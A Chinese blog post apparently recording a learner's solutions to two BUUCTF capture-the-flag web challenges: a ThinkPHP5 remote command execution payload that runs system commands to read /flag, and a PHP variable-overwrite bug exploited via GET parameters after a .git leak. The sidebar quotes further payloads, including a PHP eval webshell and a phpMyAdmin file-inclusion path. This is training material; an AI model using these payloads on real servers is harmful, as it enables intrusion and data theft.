被监督写博客-Day8

最新推荐文章于 2022-06-24 18:05:59 发布
最新推荐文章于 2022-06-24 18:05:59 发布
阅读量130 收藏
点赞数
分类专栏: 日常学习小记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/veinard_F/article/details/109009448
版权

。。。。。。。
题目一:
[BJDCTF 2nd]old-hack
提示是thinkphp5的漏洞(远程命令执行漏洞)
?s=1,查看报错信息,
在这里插入图片描述
知道是和这个版本的漏洞有关

漏洞利用:

_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

在这里插入图片描述
cat /flag
在这里插入图片描述

题目二:
[BJDCTF2020]Mark loves cat

用dirsearch扫描发现.git泄露
(注意调低线程:dirsearch.py -u url -e * --timeout=2 -t 1 -x 400,403,404,500,503,429)

<?php
$flag = file_get_contents('/flag');


<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

分析代码:
第一个foreach,如果post一个flag=abc,那么变量覆盖后是$flag=abc,最后输出的就会是abc;第二个foreach,如果get一个flag=abc,那么变量覆盖后$flag=$abc,最后输出的为空,因为$abc没有被定义
题目主要涉及的就是变量覆盖,可以用flag将exit要输出的变量覆盖,改成输出flag
payload1:

?yds=flag

在这里插入图片描述
payload2:
先是让is=flag,再满足if后面的判断条件

?is=flag&flag=flag
piubiutiu~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
react-day-picker:React的轻量级日期选择器组件
02-03
npm install react-day-picker import DayPicker from " react-day-picker " ; import " react-day-picker/lib/style.css " ; export default function Hello () { return ; } 文献资料 在卡住? v8即将到来! 下...
BUUCTF训练打卡
Leo8283的博客
04-26 610
BJDCTF2020]ZJCTF,不过如此 首先 ?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64- encode/resource=next.php 或者 者 https://www.cnblogs.com/wangtanzhi/p/12328083.html https://xz.aliyun.com/t/2557 payload:/S*=${phpinf
CTF 中的 PHP 漏洞利用总结
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
经典变量覆盖
weixin_45328342的博客
12-09 203
遇到一道不错的变量覆盖题,特此记录 <?php $flag = file_get_contents('/flag'); <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as
BUU刷题Day7
姜小孩的博客
03-30 1749
[BJDCTF2020]Mark loves cat [安洵杯 2019]easy_web [NCTF2019]Fake XML cookbook MD5强碰撞 XXE
[BUUCTF] 集训第二天
Dannie01的博客
09-29 398
补题 [GXYCTF2019]BabyUpload1 正常开端一句话木马 <?php eval($_POST[cmd]);?> php文件不许上传, 尝试上传jpg 换个姿势改一下内容 <script language='php'>eval($_POST[cmd]);</script> 上传成功,记得这个路径 因为是jpg文件,无法解析php,观察是Apache server,上传.htaccess文件来将其他文件解析成PHP文件 .htaccess文件是Apa
nodejs-day8.rar
03-05
nodejs-day8.rar
m2-day8
04-01
m2-day8
vue2-day8.zip
08-10
vue2-day8.zip
week3-day8作业.pdb
10-22
week3-day8作业.pdb
CTF小知识
qq_41996851的博客
05-07 729
dirsearch使用时可以调低线程:dirsearch.py -u url -e * --timeout=2 -t 1 -x 400,403,404,500,503,429
BUUCTF 19
qq_52431855的博客
02-01 481
知识点 PHP foreach循环 PHP foreach 循环结构是遍历数组时常用的方法,foreach 仅能够应用于数组和对象,如果尝试应用于其他数据类型的变量或者未初始化的变量将发出错误信息。 foreach 有以下两种语法格式: //格式1 foreach (array_expression as $value){ statement } //格式2 foreach (array_expression as $key => $value){ statem...
BUUCTF 个人做题记录【6-24】
qq_61620566的博客
06-24 664
学习笔记,大佬勿喷
Dirsearch 综合指南
深入交流学习:webMsec
06-16 1157
获取更多学习资料、想加入社群、深入学习,请扫我的二维码或加Memory20000427。 在本文中,我们将学习如何使用 Dirsearch。 说起国内的御剑套装,相信各位都已经非常熟悉了。但御剑已经好多年不更新了,而且需要windows,有时候线程设置大了点,扫了半天中途还可能卡住不动了,也没有实时的数据保存,前功尽弃。总之各种不爽。 现在好用的web scanner也层出不穷,我根据自己的需求和实际使用体验,最终选择了dirsearch这款工具。 基本情况 它是一个命令行工具,旨在暴力破解网站中的目录和
dirsearch用法大全
qq_43936524的博客
03-27 4万+
文章目录dirsearch扫描的目标扫描的字典类型字典格式设置响应结果的过滤请求相关设置连接相关设置通用设置输出模式常见的用法TIPS dirsearch 扫描的目标 -u,--url 目标url -l,--url-list=FILE 目标url文件路径 --stdin 从标准输入中指定url --cidr 目标网段 --raw=File 从文件
Dirsearch 速度慢排查与解决办法
柠檬木有枝
10-12 3534
一直使用 dirsearch 都很慢,今天发现扫描内网速度都很慢,不太对劲,看了下,最后发现是 clash 的 system proxy 开启的原因。开启这个选项会自动给浏览器等添加代理,不清楚是不是还有其他的骚操作,自己用 requests 脚本也没有什么问题 解决办法:关闭 calsh 的 system proxy 即可 ...
BUUCTF(10.25-11.1)
qq_52988816的博客
11-23 3581
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 6万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
day--和--day区别
最新发布
04-18
"day--"和"day"是两种不同的操作符,它们在编程中有着不同的含义和用法。 1. "day--"是一个后缀自减操作符,用于将变量的值减1,并返回减1之前的值。例如,如果有一个变量day的值为5,执行day--操作后,day的值将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值